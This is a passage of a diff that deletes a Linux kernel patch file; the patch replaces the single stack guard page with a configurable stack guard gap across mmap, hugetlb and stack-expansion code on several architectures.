-+			mm->cached_hole_size = vm_start - addr;
- 
- 		addr = vma->vm_end;
- 		if (do_color_align)
-@@ -205,7 +207,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	struct vm_area_struct *vma;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long task_size = STACK_TOP32;
--	unsigned long addr = addr0;
-+	unsigned long addr = addr0, vm_start;
- 	int do_color_align;
- 
- 	/* This should only ever run for 32-bit processes.  */
-@@ -237,7 +239,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -258,7 +260,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	/* make sure it can fit in the remaining address space */
- 	if (likely(addr > len)) {
- 		vma = find_vma(mm, addr-len);
--		if (!vma || addr <= vma->vm_start) {
-+		if (!vma || addr <= vm_start_gap(vma)) {
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr-len);
- 		}
-@@ -278,20 +280,22 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 		 * return with success:
- 		 */
- 		vma = find_vma(mm, addr);
--		if (likely(!vma || addr+len <= vma->vm_start)) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (likely(!vma || addr + len <= vm_start)) {
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr);
- 		}
- 
-  		/* remember the largest hole we saw so far */
-- 		if (addr + mm->cached_hole_size < vma->vm_start)
-- 		        mm->cached_hole_size = vma->vm_start - addr;
-+ 		if (addr + mm->cached_hole_size < vm_start)
-+ 		        mm->cached_hole_size = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = vma->vm_start-len;
-+		addr = vm_start - len;
- 		if (do_color_align)
- 			addr = COLOUR_ALIGN_DOWN(addr, pgoff);
--	} while (likely(len < vma->vm_start));
-+	} while (likely(len < vm_start));
- 
- bottomup:
- 	/*
-diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c
-index 07e1453..e13e85d 100644
---- a/arch/sparc/mm/hugetlbpage.c
-+++ b/arch/sparc/mm/hugetlbpage.c
-@@ -33,7 +33,7 @@ static unsigned long hugetlb_get_unmapped_area_bottomup(struct file *filp,
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct * vma;
- 	unsigned long task_size = TASK_SIZE;
--	unsigned long start_addr;
-+	unsigned long start_addr, vm_start;
- 
- 	if (test_thread_flag(TIF_32BIT))
- 		task_size = STACK_TOP32;
-@@ -67,15 +67,17 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (likely(!vma || addr + len <= vma->vm_start)) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (likely(!vma || addr + len <= vm_start)) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		addr = ALIGN(vma->vm_end, HPAGE_SIZE);
- 	}
-@@ -90,6 +92,7 @@ hugetlb_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	struct vm_area_struct *vma;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0;
-+	unsigned long vm_start;
- 
- 	/* This should only ever run for 32-bit processes.  */
- 	BUG_ON(!test_thread_flag(TIF_32BIT));
-@@ -106,7 +109,7 @@ hugetlb_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	/* make sure it can fit in the remaining address space */
- 	if (likely(addr > len)) {
- 		vma = find_vma(mm, addr-len);
--		if (!vma || addr <= vma->vm_start) {
-+		if (!vma || addr <= vm_start_gap(vma)) {
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr-len);
- 		}
-@@ -124,18 +127,20 @@ hugetlb_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 		 * return with success:
- 		 */
- 		vma = find_vma(mm, addr);
--		if (likely(!vma || addr+len <= vma->vm_start)) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (likely(!vma || addr + len <= vm_start)) {
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr);
- 		}
- 
-  		/* remember the largest hole we saw so far */
-- 		if (addr + mm->cached_hole_size < vma->vm_start)
-- 		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = (vma->vm_start-len) & HPAGE_MASK;
--	} while (likely(len < vma->vm_start));
-+		addr = (vm_start - len) & HPAGE_MASK;
-+	} while (likely(len < vm_start));
- 
- bottomup:
- 	/*
-@@ -182,7 +187,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, HPAGE_SIZE);
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c
-index 42cfcba..184e033 100644
---- a/arch/tile/mm/hugetlbpage.c
-+++ b/arch/tile/mm/hugetlbpage.c
-@@ -159,7 +159,7 @@ static unsigned long hugetlb_get_unmapped_area_bottomup(struct file *file,
- 	struct hstate *h = hstate_file(file);
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct *vma;
--	unsigned long start_addr;
-+	unsigned long start_addr, vm_start;
- 
- 	if (len > mm->cached_hole_size) {
- 		start_addr = mm->free_area_cache;
-@@ -185,12 +185,14 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (!vma || addr + len <= vm_start) {
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--			mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 		addr = ALIGN(vma->vm_end, huge_page_size(h));
- 	}
- }
-@@ -204,6 +206,7 @@ static unsigned long hugetlb_get_unmapped_area_topdown(struct file *file,
- 	struct vm_area_struct *vma, *prev_vma;
- 	unsigned long base = mm->mmap_base, addr = addr0;
- 	unsigned long largest_hole = mm->cached_hole_size;
-+	unsigned long vm_start;
- 	int first_time = 1;
- 
- 	/* don't allow allocations above current base */
-@@ -234,9 +237,10 @@ try_again:
- 
- 		/*
- 		 * new region fits between prev_vma->vm_end and
--		 * vma->vm_start, use it:
-+		 * vm_start, use it:
- 		 */
--		if (addr + len <= vma->vm_start &&
-+		vm_start = vm_start_gap(vma);
-+		if (addr + len <= vm_start &&
- 			    (!prev_vma || (addr >= prev_vma->vm_end))) {
- 			/* remember the address as a hint for next time */
- 			mm->cached_hole_size = largest_hole;
-@@ -251,13 +255,13 @@ try_again:
- 		}
- 
- 		/* remember the largest hole we saw so far */
--		if (addr + largest_hole < vma->vm_start)
--			largest_hole = vma->vm_start - addr;
-+		if (addr + largest_hole < vm_start)
-+			largest_hole = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = (vma->vm_start - len) & huge_page_mask(h);
-+		addr = (vm_start - len) & huge_page_mask(h);
- 
--	} while (len <= vma->vm_start);
-+	} while (len <= vm_start);
- 
- fail:
- 	/*
-@@ -312,7 +316,7 @@ unsigned long hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (current->mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c
-index cdb2fc9..0dbfff8 100644
---- a/arch/x86/kernel/sys_x86_64.c
-+++ b/arch/x86/kernel/sys_x86_64.c
-@@ -126,7 +126,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- {
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct *vma;
--	unsigned long start_addr;
-+	unsigned long start_addr, vm_start;
- 	unsigned long begin, end;
- 
- 	if (flags & MAP_FIXED)
-@@ -141,7 +141,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (end - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (((flags & MAP_32BIT) || test_thread_flag(TIF_IA32))
-@@ -172,15 +172,17 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (!vma || addr + len <= vm_start) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--			mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		addr = vma->vm_end;
- 		addr = align_addr(addr, filp, 0);
-@@ -196,6 +198,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	struct vm_area_struct *vma;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0;
-+	unsigned long vm_start;
- 
- 	/* requested length too big for entire address space */
- 	if (len > TASK_SIZE)
-@@ -213,7 +216,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -232,7 +235,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 						    ALIGN_TOPDOWN);
- 
- 		vma = find_vma(mm, tmp_addr);
--		if (!vma || tmp_addr + len <= vma->vm_start)
-+		if (!vma || tmp_addr + len <= vm_start_gap(vma))
- 			/* remember the address as a hint for next time */
- 			return mm->free_area_cache = tmp_addr;
- 	}
-@@ -251,17 +254,19 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 		 * return with success:
- 		 */
- 		vma = find_vma(mm, addr);
--		if (!vma || addr+len <= vma->vm_start)
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (!vma || addr + len <= vm_start)
- 			/* remember the address as a hint for next time */
- 			return mm->free_area_cache = addr;
- 
- 		/* remember the largest hole we saw so far */
--		if (addr + mm->cached_hole_size < vma->vm_start)
--			mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = vma->vm_start-len;
--	} while (len < vma->vm_start);
-+		addr = vm_start - len;
-+	} while (len < vm_start);
- 
- bottomup:
- 	/*
-diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c
-index df7d12c..67b8760 100644
---- a/arch/x86/mm/hugetlbpage.c
-+++ b/arch/x86/mm/hugetlbpage.c
-@@ -277,7 +277,7 @@ static unsigned long hugetlb_get_unmapped_area_bottomup(struct file *file,
- 	struct hstate *h = hstate_file(file);
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct *vma;
--	unsigned long start_addr;
-+	unsigned long start_addr, vm_start;
- 
- 	if (len > mm->cached_hole_size) {
- 	        start_addr = mm->free_area_cache;
-@@ -303,12 +303,14 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (!vma || addr + len <= vm_start) {
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 		addr = ALIGN(vma->vm_end, huge_page_size(h));
- 	}
- }
-@@ -322,6 +324,7 @@ static unsigned long hugetlb_get_unmapped_area_topdown(struct file *file,
- 	struct vm_area_struct *vma, *prev_vma;
- 	unsigned long base = mm->mmap_base, addr = addr0;
- 	unsigned long largest_hole = mm->cached_hole_size;
-+	unsigned long vm_start;
- 	int first_time = 1;
- 
- 	/* don't allow allocations above current base */
-@@ -351,7 +354,8 @@ try_again:
- 		 * new region fits between prev_vma->vm_end and
- 		 * vma->vm_start, use it:
- 		 */
--		if (addr + len <= vma->vm_start &&
-+		vm_start = vm_start_gap(vma);
-+		if (addr + len <= vm_start &&
- 		            (!prev_vma || (addr >= prev_vma->vm_end))) {
- 			/* remember the address as a hint for next time */
- 		        mm->cached_hole_size = largest_hole;
-@@ -365,12 +369,12 @@ try_again:
- 		}
- 
- 		/* remember the largest hole we saw so far */
--		if (addr + largest_hole < vma->vm_start)
--		        largest_hole = vma->vm_start - addr;
-+		if (addr + largest_hole < vm_start)
-+			largest_hole = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = (vma->vm_start - len) & huge_page_mask(h);
--	} while (len <= vma->vm_start);
-+		addr = (vm_start - len) & huge_page_mask(h);
-+	} while (len <= vm_start);
- 
- fail:
- 	/*
-@@ -426,7 +430,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
-index 5557332..99c51d6 100644
---- a/fs/hugetlbfs/inode.c
-+++ b/fs/hugetlbfs/inode.c
-@@ -150,7 +150,7 @@ hugetlb_get_unmapped_area(struct file *file, unsigned long addr,
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -176,7 +176,7 @@ full_search:
- 			return -ENOMEM;
- 		}
- 
--		if (!vma || addr + len <= vma->vm_start)
-+		if (!vma || addr + len <= vm_start_gap(vma))
- 			return addr;
- 		addr = ALIGN(vma->vm_end, huge_page_size(h));
- 	}
-diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
-index de404f2..6037a13 100644
---- a/fs/proc/task_mmu.c
-+++ b/fs/proc/task_mmu.c
-@@ -230,11 +230,7 @@ static void show_map_vma(struct seq_file *m, struct vm_area_struct *vma)
- 
- 	/* We don't show the stack guard page in /proc/maps */
- 	start = vma->vm_start;
--	if (stack_guard_page_start(vma, start))
--		start += PAGE_SIZE;
- 	end = vma->vm_end;
--	if (stack_guard_page_end(vma, end))
--		end -= PAGE_SIZE;
- 
- 	seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu %n",
- 			start,
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index 16394da..19f9043 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -1015,34 +1015,6 @@ int set_page_dirty(struct page *page);
- int set_page_dirty_lock(struct page *page);
- int clear_page_dirty_for_io(struct page *page);
- 
--/* Is the vma a continuation of the stack vma above it? */
--static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN);
--}
--
--static inline int stack_guard_page_start(struct vm_area_struct *vma,
--					     unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSDOWN) &&
--		(vma->vm_start == addr) &&
--		!vma_growsdown(vma->vm_prev, addr);
--}
--
--/* Is the vma a continuation of the stack vma below it? */
--static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP);
--}
--
--static inline int stack_guard_page_end(struct vm_area_struct *vma,
--					   unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSUP) &&
--		(vma->vm_end == addr) &&
--		!vma_growsup(vma->vm_next, addr);
--}
--
- extern unsigned long move_page_tables(struct vm_area_struct *vma,
- 		unsigned long old_addr, struct vm_area_struct *new_vma,
- 		unsigned long new_addr, unsigned long len);
-@@ -1462,6 +1434,7 @@ unsigned long ra_submit(struct file_ra_state *ra,
- 			struct address_space *mapping,
- 			struct file *filp);
- 
-+extern unsigned long stack_guard_gap;
- /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */
- extern int expand_stack(struct vm_area_struct *vma, unsigned long address);
- 
-@@ -1490,6 +1463,30 @@ static inline struct vm_area_struct * find_vma_intersection(struct mm_struct * m
- 	return vma;
- }
- 
-+static inline unsigned long vm_start_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_start = vma->vm_start;
-+
-+	if (vma->vm_flags & VM_GROWSDOWN) {
-+		vm_start -= stack_guard_gap;
-+		if (vm_start > vma->vm_start)
-+			vm_start = 0;
-+	}
-+	return vm_start;
-+}
-+
-+static inline unsigned long vm_end_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_end = vma->vm_end;
-+
-+	if (vma->vm_flags & VM_GROWSUP) {
-+		vm_end += stack_guard_gap;
-+		if (vm_end < vma->vm_end)
-+			vm_end = -PAGE_SIZE;
-+	}
-+	return vm_end;
-+}
-+
- static inline unsigned long vma_pages(struct vm_area_struct *vma)
- {
- 	return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT;
-diff --git a/mm/memory.c b/mm/memory.c
-index 2917e9b..6325103d 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -1605,12 +1605,6 @@ no_page_table:
- 	return page;
- }
- 
--static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr)
--{
--	return stack_guard_page_start(vma, addr) ||
--	       stack_guard_page_end(vma, addr+PAGE_SIZE);
--}
--
- /**
-  * __get_user_pages() - pin user pages in memory
-  * @tsk:	task_struct of target task
-@@ -1761,11 +1755,6 @@ int __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
- 				int ret;
- 				unsigned int fault_flags = 0;
- 
--				/* For mlock, just skip the stack guard page. */
--				if (foll_flags & FOLL_MLOCK) {
--					if (stack_guard_page(vma, start))
--						goto next_page;
--				}
- 				if (foll_flags & FOLL_WRITE)
- 					fault_flags |= FAULT_FLAG_WRITE;
- 				if (nonblocking)
-@@ -3122,40 +3111,6 @@ out_release:
- }
- 
- /*
-- * This is like a special single-page "expand_{down|up}wards()",
-- * except we must first make sure that 'address{-|+}PAGE_SIZE'
-- * doesn't hit another vma.
-- */
--static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address)
--{
--	address &= PAGE_MASK;
--	if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) {
--		struct vm_area_struct *prev = vma->vm_prev;
--
--		/*
--		 * Is there a mapping abutting this one below?
--		 *
--		 * That's only ok if it's the same stack mapping
--		 * that has gotten split..
--		 */
--		if (prev && prev->vm_end == address)
--			return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM;
--
--		return expand_downwards(vma, address - PAGE_SIZE);
--	}
--	if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) {
--		struct vm_area_struct *next = vma->vm_next;
--
--		/* As VM_GROWSDOWN but s/below/above/ */
--		if (next && next->vm_start == address + PAGE_SIZE)
--			return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM;
--
--		return expand_upwards(vma, address + PAGE_SIZE);
--	}
--	return 0;
--}
--
--/*
-  * We enter with non-exclusive mmap_sem (to exclude vma changes,
-  * but allow concurrent faults), and pte mapped but not yet locked.
-  * We return with mmap_sem still held, but pte unmapped and unlocked.
-@@ -3174,10 +3129,6 @@ static int do_anonymous_page(struct mm_struct *mm, struct vm_area_struct *vma,
- 	if (vma->vm_flags & VM_SHARED)
- 		return VM_FAULT_SIGBUS;
- 
--	/* Check if we need to add a guard page to the stack */
--	if (check_stack_guard_page(vma, address) < 0)
--		return VM_FAULT_SIGSEGV;
--
- 	/* Use the zero-page for reads */
- 	if (!(flags & FAULT_FLAG_WRITE)) {
- 		entry = pte_mkspecial(pfn_pte(my_zero_pfn(address),
-diff --git a/mm/mmap.c b/mm/mmap.c
-index e949a20..cbcf486 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -245,6 +245,7 @@ SYSCALL_DEFINE1(brk, unsigned long, brk)
- 	unsigned long rlim, retval;
- 	unsigned long newbrk, oldbrk;
- 	struct mm_struct *mm = current->mm;
-+	struct vm_area_struct *next;
- 	unsigned long min_brk;
- 
- 	down_write(&mm->mmap_sem);
-@@ -289,7 +290,8 @@ SYSCALL_DEFINE1(brk, unsigned long, brk)
- 	}
- 
- 	/* Check against existing mmap mappings. */
--	if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE))
-+	next = find_vma(mm, oldbrk);
-+	if (next && newbrk + PAGE_SIZE > vm_start_gap(next))
- 		goto out;
- 
- 	/* Ok, looks good - let it rip. */
-@@ -1368,8 +1370,8 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 		unsigned long len, unsigned long pgoff, unsigned long flags)
- {
- 	struct mm_struct *mm = current->mm;
--	struct vm_area_struct *vma;
--	unsigned long start_addr;
-+	struct vm_area_struct *vma, *prev;
-+	unsigned long start_addr, vm_start, prev_end;
- 
- 	if (len > TASK_SIZE - mmap_min_addr)
- 		return -ENOMEM;
-@@ -1379,9 +1381,10 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr && addr >= mmap_min_addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)) &&
-+		    (!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 	if (len > mm->cached_hole_size) {
-@@ -1392,7 +1395,17 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 	}
- 
- full_search:
--	for (vma = find_vma(mm, addr); ; vma = vma->vm_next) {
-+	for (vma = find_vma_prev(mm, addr, &prev); ; prev = vma,
-+						vma = vma->vm_next) {
-+		if (prev) {
-+			prev_end = vm_end_gap(prev);
-+			if (addr < prev_end) {
-+				addr = prev_end;
-+				/* If vma already violates gap, forget it */
-+				if (vma && addr > vma->vm_start)
-+					addr = vma->vm_start;
-+			}
-+		}
- 		/* At this point:  (!vma || addr < vma->vm_end). */
- 		if (TASK_SIZE - len < addr) {
- 			/*
-@@ -1407,16 +1420,16 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		vm_start = vma ? vm_start_gap(vma) : TASK_SIZE;
-+		if (addr + len <= vm_start) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
--		addr = vma->vm_end;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 	}
- }
- #endif	
-@@ -1442,9 +1455,10 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 			  const unsigned long len, const unsigned long pgoff,
- 			  const unsigned long flags)
- {
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0;
-+	unsigned long vm_start, prev_end;
- 	unsigned long low_limit = max(PAGE_SIZE, mmap_min_addr);
- 
- 	/* requested length too big for entire address space */
-@@ -1457,9 +1471,10 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	/* requesting a specific address */
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr && addr >= mmap_min_addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)) &&
-+				(!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 
-@@ -1474,8 +1489,9 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 
- 	/* make sure it can fit in the remaining address space */
- 	if (addr >= low_limit + len) {
--		vma = find_vma(mm, addr-len);
--		if (!vma || addr <= vma->vm_start)
-+		vma = find_vma_prev(mm, addr-len, &prev);
-+		if ((!vma || addr <= vm_start_gap(vma)) &&
-+		    (!prev || addr-len >= vm_end_gap(prev)))
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr-len);
- 	}
-@@ -1491,18 +1507,21 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 		 * else if new region fits below vma->vm_start,
- 		 * return with success:
- 		 */
--		vma = find_vma(mm, addr);
--		if (!vma || addr+len <= vma->vm_start)
-+		vma = find_vma_prev(mm, addr, &prev);
-+		vm_start = vma ? vm_start_gap(vma) : mm->mmap_base;
-+		prev_end = prev ? vm_end_gap(prev) : low_limit;
-+
-+		if (addr + len <= vm_start && addr >= prev_end)
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr);
- 
-  		/* remember the largest hole we saw so far */
-- 		if (addr + mm->cached_hole_size < vma->vm_start)
-- 		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = vma->vm_start-len;
--	} while (vma->vm_start >= low_limit + len);
-+		addr = vm_start - len;
-+	} while (vm_start >= low_limit + len);
- 
- bottomup:
- 	/*
-@@ -1647,21 +1666,19 @@ out:
-  * update accounting. This is shared with both the
-  * grow-up and grow-down cases.
-  */
--static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, unsigned long grow)
-+static int acct_stack_growth(struct vm_area_struct *vma,
-+			     unsigned long size, unsigned long grow)
- {
- 	struct mm_struct *mm = vma->vm_mm;
- 	struct rlimit *rlim = current->signal->rlim;
--	unsigned long new_start, actual_size;
-+	unsigned long new_start;
- 
- 	/* address space limit tests */
- 	if (!may_expand_vm(mm, grow))
- 		return -ENOMEM;
- 
- 	/* Stack limit test */
--	actual_size = size;
--	if (size && (vma->vm_flags & (VM_GROWSUP | VM_GROWSDOWN)))
--		actual_size -= PAGE_SIZE;
--	if (actual_size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur))
-+	if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur))
- 		return -ENOMEM;
- 
- 	/* mlock limit tests */
-@@ -1703,32 +1720,40 @@ static int acct_stack_growth(struct vm_area_struct *vma, unsigned long size, uns
-  */
- int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- {
--	int error;
-+	struct vm_area_struct *next;
-+	unsigned long gap_addr;
-+	int error = 0;
- 
- 	if (!(vma->vm_flags & VM_GROWSUP))
- 		return -EFAULT;
- 
--	/*
--	 * We must make sure the anon_vma is allocated
--	 * so that the anon_vma locking is not a noop.
--	 */
-+	/* Guard against wrapping around to address 0. */
-+	address &= PAGE_MASK;
-+	address += PAGE_SIZE;
-+	if (!address)
-+		return -ENOMEM;
-+
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address + stack_guard_gap;
-+	if (gap_addr < address)
-+		return -ENOMEM;
-+	next = vma->vm_next;
-+	if (next && next->vm_start < gap_addr) {
-+		if (!(next->vm_flags & VM_GROWSUP))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
-+	/* We must make sure the anon_vma is allocated. */
- 	if (unlikely(anon_vma_prepare(vma)))
- 		return -ENOMEM;
--	vma_lock_anon_vma(vma);
- 
- 	/*
- 	 * vma->vm_start/vm_end cannot change under us because the caller
- 	 * is required to hold the mmap_sem in read mode.  We need the
- 	 * anon_vma lock to serialize against concurrent expand_stacks.
--	 * Also guard against wrapping around to address 0.
- 	 */
--	if (address < PAGE_ALIGN(address+4))
--		address = PAGE_ALIGN(address+4);
--	else {
--		vma_unlock_anon_vma(vma);
--		return -ENOMEM;
--	}
--	error = 0;
-+	vma_lock_anon_vma(vma);
- 
- 	/* Somebody else might have raced and expanded it already */
- 	if (address > vma->vm_end) {
-@@ -1758,27 +1783,36 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- int expand_downwards(struct vm_area_struct *vma,
- 				   unsigned long address)
- {
-+	struct vm_area_struct *prev;
